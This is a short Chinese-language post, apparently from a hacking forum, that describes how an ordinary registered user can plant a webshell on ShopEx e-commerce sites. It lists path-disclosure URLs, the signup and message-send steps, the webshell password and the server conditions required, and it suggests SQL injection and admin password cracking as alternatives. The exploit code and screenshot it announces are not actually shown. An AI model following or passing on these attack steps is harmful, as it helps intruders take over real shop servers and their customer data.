shopex前台普通用户getshell最新漏洞

shopex漏洞利用方法:

第一:想办法找到目标网站的绝对路径
http://www.site.com/install/svinfo.php?phpinfo=true
http://www.site.com/core/api/shop_api.php
http://www.site.com/core/api/site/2.0/api_b2b_2_0_cat.php
http://www.site.com/core/api/site/2.0/api_b2b_2_0_goodstype.php
http://www.site.com/core/api/site/2.0/api_b2b_2_0_brand.php
shopex存在很多爆路径的漏洞,请自行研究。

第二:注册一个普通用户
http://www.site.com/?passport-signup.html

第三:发送消息
http://www.site.com/?member-send.html

利用代码

一句话的密码是#

这个漏洞,对于mysql用户权限有要求的,对于导出的目录也得有可写的要求,服务器环境也有要求。
如果无法getshell的话,也可以尝试注入,破密码进后台也一样

shell图




评论 (0)